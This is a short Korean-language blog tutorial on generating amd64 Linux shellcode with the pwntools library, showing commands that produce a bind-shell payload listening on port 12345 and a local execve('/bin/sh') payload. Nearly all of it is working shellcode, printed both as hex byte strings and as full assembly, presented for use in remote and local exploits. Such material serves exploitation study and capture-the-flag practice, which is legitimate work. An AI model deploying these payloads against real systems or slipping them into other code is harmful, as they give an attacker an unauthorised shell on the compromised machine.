#dokydoky

[Shellcode] pwntools을 이용한 shellcode 만들기 본문

System Hacking

[Shellcode] pwntools을 이용한 shellcode 만들기

dokydoky 2016. 12. 20. 16:04

context에서 architecture, os를 지정한 후 아래와 같이 쉘코드를 생성할 수 있다.

shellcraft.bindsh은 standalone 데몬을 remote exploit하기 위한 쉘코드.

shellcraft.sh은 local exploit이나 xinetd로 관리되는 바이너리를  exploit하기 위한 쉘코드

(stanalone, xinetd가 이해되지 않는다면 참고 : http://dokydoky.tistory.com/446) 

In [57]: from pwn import *


In [58]: context(arch='amd64', os='linux')


In [59]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.bindsh(12345, network='ipv4'))])

\x6A\x29\x58\x6A\x02\x5F\x6A\x01\x5E\x99\x0F\x05\x52\xBA\x01\x01\x01\x01\x81\xF2\x03\x01\x31\x38\x52\x6A\x10\x5A\x48\x89\xC5\x48\x89\xC7\x6A\x31\x58\x48\x89\xE6\x0F\x05\x6A\x32\x58\x48\x89\xEF\x6A\x01\x5E\x0F\x05\x6A\x2B\x58\x48\x89\xEF\x31\xF6\x99\x0F\x05\x48\x89\xC5\x6A\x03\x5E\x48\xFF\xCE\x78\x0B\x56\x6A\x21\x58\x48\x89\xEF\x0F\x05\xEB\xEF\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05


In [60]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.sh())])

\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05



어셈블리 코드는 아래와 같다.

In [62]: print shellcraft.bindsh(12345, network='ipv4')

    /* call socket('AF_INET', 'SOCK_STREAM', 0) */

    push (SYS_socket) /* 0x29 */

    pop rax

    push (AF_INET) /* 2 */

    pop rdi

    push (SOCK_STREAM) /* 1 */

    pop rsi

    cdq /* rdx=0 */

    syscall

    /* Build sockaddr_in structure */

    push rdx

    mov edx, 0x1010101 /* (AF_INET | (14640 << 16)) == 0x39300002 */

    xor edx, 0x38310103

    push rdx

    /* rdx = sizeof(struct sockaddr_in6) */

    push 0x10

    pop rdx

    /* Save server socket in rbp */

    mov rbp, rax

    /* call bind('rax', 'rsp', 'rdx') */

    mov rdi, rax

    push (SYS_bind) /* 0x31 */

    pop rax

    mov rsi, rsp

    syscall

    /* call listen('rbp', 1) */

    push (SYS_listen) /* 0x32 */

    pop rax

    mov rdi, rbp

    push 1

    pop rsi

    syscall

    /* call accept('rbp', 0, 0) */

    push (SYS_accept) /* 0x2b */

    pop rax

    mov rdi, rbp

    xor esi, esi /* 0 */

    cdq /* rdx=0 */

    syscall

dup_106:

    mov rbp, rax


    push 3

loop_107:

    pop rsi

    dec rsi

    js after_108

    push rsi


    /* call dup2('rbp', 'rsi') */

    push (SYS_dup2) /* 0x21 */

    pop rax

    mov rdi, rbp

    syscall


    jmp loop_107

after_108:


    /* push argument array ['sh\x00'] */

    /* push 'sh\x00' */

    push 0x1010101 ^ 0x6873

    xor dword ptr [rsp], 0x1010101

    xor edx, edx /* 0 */

    push rdx /* null terminate */

    push 8

    pop rdx

    add rdx, rsp

    push rdx /* 'sh\x00' */

    mov rdx, rsp

    

    /* push '/bin///sh\x00' */

    push 0x68

    mov rax, 0x732f2f2f6e69622f

    push rax

    

    /* call execve('rsp', 'rdx', 0) */

    push (SYS_execve) /* 0x3b */

    pop rax

    mov rdi, rsp

    mov rsi, rdx

    cdq /* rdx=0 */

    syscall



In [63]: print shellcraft.sh()

    /* push argument array ['sh\x00'] */

    /* push 'sh\x00' */

    push 0x1010101 ^ 0x6873

    xor dword ptr [rsp], 0x1010101

    xor edx, edx /* 0 */

    push rdx /* null terminate */

    push 8

    pop rdx

    add rdx, rsp

    push rdx /* 'sh\x00' */

    mov rdx, rsp

    

    /* push '/bin///sh\x00' */

    push 0x68

    mov rax, 0x732f2f2f6e69622f

    push rax

    

    /* call execve('rsp', 'rdx', 0) */

    push (SYS_execve) /* 0x3b */

    pop rax

    mov rdi, rsp

    mov rsi, rdx

    cdq /* rdx=0 */

    syscall



Comments